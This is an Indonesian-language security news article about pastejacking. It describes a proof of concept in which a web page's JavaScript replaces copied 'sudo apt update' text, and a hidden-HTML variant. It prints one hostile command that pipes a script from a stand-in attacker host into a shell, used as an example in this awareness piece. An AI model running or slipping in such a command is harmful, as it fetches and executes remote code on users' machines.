Baru-baru ini, Gabriel Friedlander, pendiri platform pelatihan kesadaran keamanan Wizer mendemonstrasikan peretasan yang jelas namun mengejutkan yang akan membuat Anda berhati-hati dalam menyalin-menempelkan perintah dari halaman web.
Friedlander memperingatkan sebuah halaman web dapat secara diam-diam mengganti konten dari apa yang ada di clipboard Anda, dan yang lebih buruk lagi pengembang mungkin hanya menyadari kesalahan mereka setelah menempelkan teks, dan pada saat itu mungkin sudah terlambat.
Dalam bukti konsep sederhana (PoC) yang diterbitkan di blognya, Friedlander meminta pembaca untuk menyalin perintah sederhana yang akan dikenal oleh sebagian besar sysadmin dan pengembang:
Sekarang, tempelkan apa yang Anda salin dari blog Friedlander ke dalam kotak teks atau Notepad, dan hasilnya mungkin akan membuat Anda terkejut:
curl http://attacker-domain:8000/shell.sh | SH
Anda tidak hanya mendapatkan perintah yang sama sekali berbeda di clipboard Anda, tetapi untuk memperburuk keadaan, ia memiliki karakter baris baru (atau kembali) di akhir.
Mereka yang menempelkan teks mungkin mendapat kesan bahwa mereka menyalin perintah sudo apt update yang familier dan tidak berbahaya yang digunakan untuk mengambil informasi terbaru pada perangkat lunak yang diinstal pada sistem Anda.
Keajaibannya ada pada kode JavaScript yang tersembunyi di balik pengaturan halaman HTML PoC oleh Friedlander. Setelah Anda menyalin teks “sudo apt update” yang terdapat dalam elemen HTML, cuplikan kode, yang ditampilkan di bawah ini berjalan.
Apa yang terjadi setelahnya adalah ‘pendengar acara’ JavaScript yang menangkap peristiwa penyalinan dan mengganti data papan klip dengan kode uji berbahaya Friedlander:
“Inilah mengapa Anda TIDAK PERNAH menyalin perintah tempel langsung ke terminal Anda,” Friedlander memperingatkan.
“Anda pikir Anda menyalin satu hal, tetapi itu diganti dengan sesuatu yang lain, seperti kode berbahaya. Yang diperlukan hanyalah satu baris kode yang disuntikkan ke dalam kode yang Anda salin untuk membuat pintu belakang ke aplikasi Anda.”
Seorang pengguna Reddit juga menyajikan contoh alternatif dari trik ini yang tidak memerlukan JavaScript: teks tak terlihat yang dibuat dengan gaya HTML dan CSS yang disalin ke clipboard Anda saat Anda menyalin bagian teks yang terlihat:
“Masalahnya bukan hanya situs web dapat mengubah konten clipboard Anda menggunakan JavaScript,” jelas pengguna, SwallowYourDreams.
“Bisa juga hanya menyembunyikan perintah dalam HTML yang tidak terlihat oleh mata manusia, tetapi akan disalin oleh komputer.”
Jadi, alasan lain untuk tidak pernah secara membabi buta mempercayai apa yang Anda salin dari halaman web—lebih baik tempel di editor teks terlebih dahulu.
Sumber : Bleeping Computer
